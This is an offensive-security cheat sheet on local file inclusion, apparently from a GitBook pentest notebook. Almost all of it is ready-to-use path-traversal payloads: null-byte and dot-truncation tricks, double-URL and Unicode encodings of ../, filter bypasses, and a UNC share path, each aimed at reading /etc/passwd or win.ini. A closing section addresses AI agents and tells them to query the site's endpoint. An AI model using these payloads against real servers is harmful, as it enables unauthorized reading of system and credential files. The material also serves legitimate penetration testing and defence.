# LFI

```

NULL CARACTER:
Sometimes applications append extra characters, like file extensions, to the input variable. A null byte will make the application ignore the following characters.

original→ index.php?somefile=image.jpeg
testing → index.php?somefile=../../../../etc/passwd%00image.jpeg

Note: PHP fixed the issue in version 5.3.4. https://bugs.php.net/bug.php?id=39863

===========================================================

Dot Truncation #
In PHP, filenames longer than 4096 bytes will be truncated and, characters after that, ignored.

http://example.com/index.php?page=../../../etc/passwd................[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../../etc/passwd

Note: In PHP: /etc/passwd = /etc//passwd = /etc/./passwd = /etc/passwd/ = /etc/passwd/

=======================================================


Encoding 
Manipulating variables that reference files with “dot-dot-slash" (../) sequences and its variations, or using absolute file paths, may allow bypassing poorly implemented input filtering.

					URL					Double URL				UTF-8 Unicode																16 bits Unicode
.					%2e					%252e					     %c0%2e 		%e0%40%ae	 %c0%ae							%u002e
/					%2f					%252f						%c0%2f		%e0%80%af 	 %c0%af							%u2215
\					%2c					%252c						%c0%5c 		%c0%80%5c	 										%u2216



Encoded ../:

%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215



Encoded ..\:
%2e%2e%2c
%252e%252e%252c
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2216



Double URL Encoding :

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd


UTF-8 Encoding:

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd



Bypass Filtering:
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd


Bypass ../ removal:
..././
...\.\


Bypass ../ replaced with ;:
..;/
http://example.com/page.jsp?include=..;/..;/sensitive.txt




Windows UNC Share:

Windows UNC shares can be injected to redirect access to other resources.

\\localhost\c$\windows\win.ini


```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://p1yushsecurity.gitbook.io/offsec/exploitation/web-site-exploitation-vectors/lfi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.